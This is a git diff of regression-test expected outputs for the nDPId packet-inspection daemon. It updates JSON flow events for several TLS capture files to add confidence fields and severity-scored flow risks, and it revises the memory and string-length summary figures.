+00956{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1553619078033,"flow_last_seen":1553619078091,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"ts_msec":1553619078091,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.repubblica.it","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+02422{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1553619078033,"flow_last_seen":1553619078093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4613,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":1553619078093,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.repubblica.it","server_names":"www.repstatic.it,repstatic.it,amp-video.lastampa.it,www.repubblica.it,amp-video.deejay.it,amp-video.d.repubblica.it,www.gelestatic.it,oasjs.kataweb.it,video.d.repubblica.it,www.test.capital.it,napoli.repubblica.it,video.ilsecoloxix.it,genova.repubblica.it,cdn.gelestatic.it,video.gelocal.it,media.deejay.it,media.m2o.it,amp-video.espresso.repubblica.it,download.gelocal.it,amp-video.m2o.it,bologna.repubblica.it,torino.repubblica.it,scripts.kataweb.it,palermo.repubblica.it,roma.repubblica.it,video.xl.repubblica.it,amp-video.gelocal.it,video.espresso.repubblica.it,www.capital.it,video.limesonline.com,media.capital.it,syndication-vod-pro.akamai.media.kataweb.it,test.capital.it,video.deejay.it,video.repubblica.it,milano.repubblica.it,video.lanuovasardegna.it,video.m2o.it,parma.repubblica.it,video.3nz.it,syndication-vod-hds.akamai.media.kataweb.it,amp-video.repubblica.it,video.lastampa.it,webfragments.repubblica.it,amp-video.xl.repubblica.it,amp-video.limesonline.com,media.kataweb.it,bari.repubblica.it,syndication-vod-hls.akamai.media.kataweb.it,amp-video.3nz.it,syndication3rd-vod-pro.akamai.media.kataweb.it,firenze.repubblica.it,amp-video.ilsecoloxix.it,amp-video.lanuovasardegna.it,cdn.flv.kataweb.it","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=GeoTrust RSA CA 2018","subjectDN":"C=IT, ST=Roma, L=Roma, O=GEDI Digital S.r.l., CN=www.repstatic.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"0C:9F:21:DB:65:A1:BE:EB:D8:89:38:D3:FF:7A:D9:02:8B:F1:60:A1"}}
+00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":182,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":182,"flow_first_seen":1553619078033,"flow_last_seen":1553619149372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":105569,"flow_avg_l4_payload_len":580,"midstream":0,"ts_msec":1553619149372,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00163{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":182,"source":"tls_long_cert.pcap","alias":"nDPId-test","total-events-serialized":10}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 182/182
@@ -16,10 +16,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4640945 bytes
-~~ total memory freed........: 4640945 bytes
-~~ total allocations/frees...: 99797/99797
+~~ total memory allocated....: 4725898 bytes
+~~ total memory freed........: 4725898 bytes
+~~ total allocations/frees...: 101387/101387
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 168 chars
-~~ json string max len.......: 2401 chars
-~~ json string avg len.......: 1255 chars
+~~ json string max len.......: 2427 chars
+~~ json string avg len.......: 1268 chars
diff --git a/test/results/tls_port_80.pcapng.out b/test/results/tls_port_80.pcapng.out
index e359d3649..9586d0c82 100644
--- a/test/results/tls_port_80.pcapng.out
+++ b/test/results/tls_port_80.pcapng.out
@@ -3,8 +3,8 @@
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1618744619257,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1618744619257,"pkt":"AAAAAAAAAAQAaFgECABFAAA062pAAH8G+tE5W8rChDGNOMVtAFCEMAfKAAAAAIAC+vANRAAAAgQFUAEDAwgBAQQC"}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1618744619383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1618744619383,"pkt":"AAAAAAAAAAMAlyocCABFAAA0AABAADUGMD2EMY04OVvKwgBQxW2J+2kQhDAHy4AS+vAZxAAAAgQFtAEBBAIBAwMH"}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1618744620269,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1618744620269,"pkt":"AAAAAAAAAAQAaFgECABFAAA062tAAH8G+tA5W8rChDGNOMVtAFCEMAfKAAAAAIAC+vANRAAAAgQFUAEDAwgBAQQC"}
-00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1618744619257,"flow_last_seen":1618744633780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1618744633780,"l3_proto":"ip4","src_ip":"57.91.202.194","dst_ip":"132.49.141.56","src_port":50541,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00964{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":13,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1618744619257,"flow_last_seen":1618744633908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":1605,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1618744633908,"l3_proto":"ip4","src_ip":"57.91.202.194","dst_ip":"132.49.141.56","src_port":50541,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"}}
+01174{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1618744619257,"flow_last_seen":1618744633780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1618744633780,"l3_proto":"ip4","src_ip":"57.91.202.194","dst_ip":"132.49.141.56","src_port":50541,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01233{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":13,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1618744619257,"flow_last_seen":1618744633908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":1605,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1618744633908,"l3_proto":"ip4","src_ip":"57.91.202.194","dst_ip":"132.49.141.56","src_port":50541,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1618744619257,"flow_last_seen":1618744633908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":1605,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1618744633908,"l3_proto":"ip4","src_ip":"57.91.202.194","dst_ip":"132.49.141.56","src_port":50541,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00161{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":13,"source":"tls_port_80.pcapng","alias":"nDPId-test","total-events-serialized":9}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -15,10 +15,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4597254 bytes
-~~ total memory freed........: 4597254 bytes
-~~ total allocations/frees...: 99567/99567
+~~ total memory allocated....: 4682207 bytes
+~~ total memory freed........: 4682207 bytes
+~~ total allocations/frees...: 101157/101157
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 166 chars
-~~ json string max len.......: 969 chars
-~~ json string avg len.......: 622 chars
+~~ json string max len.......: 1238 chars
+~~ json string avg len.......: 749 chars
diff --git a/test/results/tls_torrent.pcapng.out b/test/results/tls_torrent.pcapng.out
index 4bf2e7fc2..4d5f9096e 100644
--- a/test/results/tls_torrent.pcapng.out
+++ b/test/results/tls_torrent.pcapng.out
@@ -3,10 +3,10 @@
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1639054407415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1639054407415,"pkt":"AAAAAAAAAAcAAh9nCABFAAA0ug0AAOIGSgIKCgoBwKgAAQG75dqEHE30Ee7ob4ASBaDg4gAAAgQFeAEBBAIBAwMJ"}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1639054407427,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1639054407427,"pkt":"AAAAAAAAAAcAAh9nCABFAAA0ug8AAOIGSgAKCgoBwKgAAQG75dqEHE30Ee7ob4ASBaDg4gAAAgQFeAEBBAIBAwMJ"}
 00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1639054407443,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"ts_msec":1639054407443,"pkt":"AAAAAAAAAAgAP8PgCABFAAF07ppAAH8GNzXAqAABCgoKAeXaAbsR7uhvhBxN9VAYAQFi5gAAFgMBAUcBAAFDAwMaHZWwfkF0Un0n60H4DuzdTswHjey14FNv5IuITjtzKgAArMAwwCzAKMAkwBTACgClAKMAoQCfAGsAagBpAGgAOQA4ADcANgCIAIcAhgCFwDLALsAqwCbAD8AFAJ0APQA1AITAL8ArwCfAI8ATwAkApACiAKAAngBnAEAAPwA+ADMAMgAxADAAmgCZAJgAlwBFAEQAQwBCwDHALcApwCXADsAEAJwAPAAvAJYAQQAHwBHAB8AMwAIABQAEwBLACAAWABMAEAANwA3AAwAKAP8BAABuAAAAFQATAAAQd2ViLnV0b3JyZW50LmNvbQALAAQDAAECAAoAHAAaABcAGQAcABsAGAAaABYADgANAAsADAAJAAoAIwAAAA0AIAAeBgEGAgYDBQEFAgUDBAEEAgQDAwEDAgMDAgECAgIDAA8AAQE="}
-00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1639054407415,"flow_last_seen":1639054407443,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":332,"flow_tot_l4_payload_len":332,"flow_avg_l4_payload_len":110,"midstream":0,"ts_msec":1639054407443,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.utorrent.com","ja3":"fd80fa9c6120cdeea8520510f3c644ac","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00893{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639054407415,"flow_last_seen":1639054407574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1732,"flow_avg_l4_payload_len":433,"midstream":0,"ts_msec":1639054407574,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.utorrent.com","ja3":"fd80fa9c6120cdeea8520510f3c644ac","ja3s":"6f84bbe9810ec4ea9061cc1a02eaf83c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
-01225{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1639054407415,"flow_last_seen":1639054407576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5906,"flow_avg_l4_payload_len":843,"midstream":0,"ts_msec":1639054407576,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.BitTorrent","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.utorrent.com","server_names":"*.utorrent.com,utorrent.com","ja3":"fd80fa9c6120cdeea8520510f3c644ac","ja3s":"6f84bbe9810ec4ea9061cc1a02eaf83c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"CN=*.utorrent.com","fingerprint":"E4:8F:E4:15:C7:D0:B7:EA:E6:F6:B1:B4:40:F0:13:D1:5E:7F:64:E8"}}
-00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1639054407415,"flow_last_seen":1639054407576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5906,"flow_avg_l4_payload_len":843,"midstream":0,"ts_msec":1639054407576,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.BitTorrent","breed":"Acceptable","category":"Download"}}
+00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1639054407415,"flow_last_seen":1639054407443,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":332,"flow_tot_l4_payload_len":332,"flow_avg_l4_payload_len":110,"midstream":0,"ts_msec":1639054407443,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.utorrent.com","ja3":"fd80fa9c6120cdeea8520510f3c644ac","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639054407415,"flow_last_seen":1639054407574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1732,"flow_avg_l4_payload_len":433,"midstream":0,"ts_msec":1639054407574,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.utorrent.com","ja3":"fd80fa9c6120cdeea8520510f3c644ac","ja3s":"6f84bbe9810ec4ea9061cc1a02eaf83c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+01331{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1639054407415,"flow_last_seen":1639054407576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5906,"flow_avg_l4_payload_len":843,"midstream":0,"ts_msec":1639054407576,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.BitTorrent","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.utorrent.com","server_names":"*.utorrent.com,utorrent.com","ja3":"fd80fa9c6120cdeea8520510f3c644ac","ja3s":"6f84bbe9810ec4ea9061cc1a02eaf83c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"CN=*.utorrent.com","fingerprint":"E4:8F:E4:15:C7:D0:B7:EA:E6:F6:B1:B4:40:F0:13:D1:5E:7F:64:E8"}}
+00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1639054407415,"flow_last_seen":1639054407576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5906,"flow_avg_l4_payload_len":843,"midstream":0,"ts_msec":1639054407576,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.BitTorrent","breed":"Acceptable","category":"Download"}}
 00161{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":7,"source":"tls_torrent.pcapng","alias":"nDPId-test","total-events-serialized":10}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 7/7
@@ -16,10 +16,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4609558 bytes
-~~ total memory freed........: 4609558 bytes
-~~ total allocations/frees...: 99568/99568
+~~ total memory allocated....: 4694511 bytes
+~~ total memory freed........: 4694511 bytes
+~~ total allocations/frees...: 101158/101158
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 166 chars
-~~ json string max len.......: 1230 chars
-~~ json string avg len.......: 745 chars
+~~ json string max len.......: 1336 chars
+~~ json string avg len.......: 795 chars
diff --git a/test/results/tls_verylong_certificate.pcap.out b/test/results/tls_verylong_certificate.pcap.out
index e07ad4d6f..119eb3c48 100644
--- a/test/results/tls_verylong_certificate.pcap.out
+++ b/test/results/tls_verylong_certificate.pcap.out
@@ -3,10 +3,10 @@
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1578254908457,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1578254908457,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGntnAqAGgl2VCMdYUAbur4+BEAAAAALAC\/\/9+XwAAAgQFtAEDAwUBAQgKAb+3BwAAAAAEAgAA"}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1578254908469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578254908469,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADYGqN2XZUIxwKgBoAG71hTYdp3Gq+PgRaASauCAYQAAAgQFZAQCCApynbuCAb+3BwEDAwk="}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1578254908469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578254908469,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGnuXAqAGgl2VCMdYUAbur4+BF2Hadx4AQEAgJrQAAAQEICgG\/txJynbuC"}
-00821{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578254908457,"flow_last_seen":1578254908475,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1578254908475,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feodotracker.abuse.ch","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
